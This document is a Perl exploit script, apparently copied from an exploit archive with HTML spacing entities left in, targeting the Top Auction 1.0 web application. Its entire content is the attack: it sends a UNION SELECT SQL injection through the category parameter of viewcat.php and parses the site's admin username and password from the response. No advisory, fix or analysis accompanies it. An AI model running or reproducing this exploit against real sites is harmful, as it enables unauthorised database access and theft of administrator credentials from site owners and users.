Top Auction 1.0 (viewcat.php) Remote SQL Injection Exploit

#!/usr/bin/perl #[Script&nbsp;Name:&nbsp;Top&nbsp;Auction&nbsp;1.0&nbsp;(viewcat.php)&nbsp;Remote&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit #[Coded&nbsp;by&nbsp;&nbsp;&nbsp;:&nbsp;ajann #[Author&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann #[Contact&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;:( #[S.Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://www.phplabs.com #[$$&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;39.95$ #[..&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;ajann,Turkey use&nbsp;IO::Socket; if(@ARGV&nbsp;<&nbsp;1){ print&nbsp;\" [======================================================================== [//&nbsp;&nbsp;&nbsp; Top&nbsp;Auction&nbsp;1.0&nbsp;(viewcat.php)&nbsp;Remote&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Usage:&nbsp;exploit.pl&nbsp;[target] [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:&nbsp;exploit.pl&nbsp;victim.com [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:&nbsp;exploit.pl&nbsp;victim.com [//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vuln&Exp&nbsp;:&nbsp;ajann [======================================================================== \"; exit(); } #Local&nbsp;variables $server&nbsp;=&nbsp;$ARGV[0]; $server&nbsp;=~&nbsp;s/(http://)//eg; $host&nbsp;=&nbsp;\"http://\".$server; $port&nbsp;=&nbsp;\"80\"; $file&nbsp;=&nbsp;\"/viewcat.php?category=\"; print&nbsp;\"Script&nbsp;<DIR>&nbsp;:&nbsp;\"; $dir&nbsp;=&nbsp;<STDIN>; chop&nbsp;($dir); if&nbsp;($dir&nbsp;=~&nbsp;/exit/){ print&nbsp;\"--&nbsp;Exploit&nbsp;Failed[You&nbsp;Are&nbsp;Exited]&nbsp; \"; exit(); } if&nbsp;($dir&nbsp;=~&nbsp;///){} else&nbsp;{ print&nbsp;\"--&nbsp;Exploit&nbsp;Failed[No&nbsp;DIR]&nbsp; \"; exit(); &nbsp;} $target&nbsp;=&nbsp;\"-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),nick,char(112,97,115,115,58),password),3%20from%20users/*\"; $target&nbsp;=&nbsp;$host.$dir.$file.$target; #Writing&nbsp;data&nbsp;to&nbsp;socket print&nbsp;\"+**********************************************************************+ \"; print&nbsp;\"+&nbsp;Trying&nbsp;to&nbsp;connect:&nbsp;$server \"; $socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto&nbsp;=>&nbsp;\"tcp\",&nbsp;PeerAddr&nbsp;=>&nbsp;\"$server\",&nbsp;PeerPort&nbsp;=>&nbsp;\"$port\")&nbsp;||&nbsp;die&nbsp;\" +&nbsp;Connection&nbsp;failed... \"; print&nbsp;$socket&nbsp;\"GET&nbsp;$target&nbsp;HTTP/1.1 \"; print&nbsp;$socket&nbsp;\"Host:&nbsp;$server \"; print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/* \"; print&nbsp;$socket&nbsp;\"Connection:&nbsp;close \"; print&nbsp;\"+&nbsp;Connected!... \"; #Getting while($answer&nbsp;=&nbsp;<$socket>)&nbsp;{ if&nbsp;($answer&nbsp;=~&nbsp;/username:(.*?)pass/){ print&nbsp;\"+&nbsp;Exploit&nbsp;succeed!&nbsp;Getting&nbsp;admin&nbsp;information. \"; print&nbsp;\"+&nbsp;----------------&nbsp;+ \"; print&nbsp;\"+&nbsp;Username:&nbsp;$1 \"; } if&nbsp;($answer&nbsp;=~&nbsp;/pass:(.*?)</title>/){ print&nbsp;\"+&nbsp;Password:&nbsp;$1 \"; } if&nbsp;($answer&nbsp;=~&nbsp;/Syntax&nbsp;error/)&nbsp;{&nbsp; print&nbsp;\"+&nbsp;Exploit&nbsp;Failed&nbsp;:&nbsp;(&nbsp; \"; print&nbsp;\"+**********************************************************************+ \"; exit();&nbsp; } if&nbsp;($answer&nbsp;=~&nbsp;/Internal&nbsp;Server&nbsp;Error/)&nbsp;{ print&nbsp;\"+&nbsp;Exploit&nbsp;Failed&nbsp;:&nbsp;(&nbsp;&nbsp; \"; print&nbsp;\"+**********************************************************************+ \"; exit();&nbsp; } &nbsp;} &nbsp;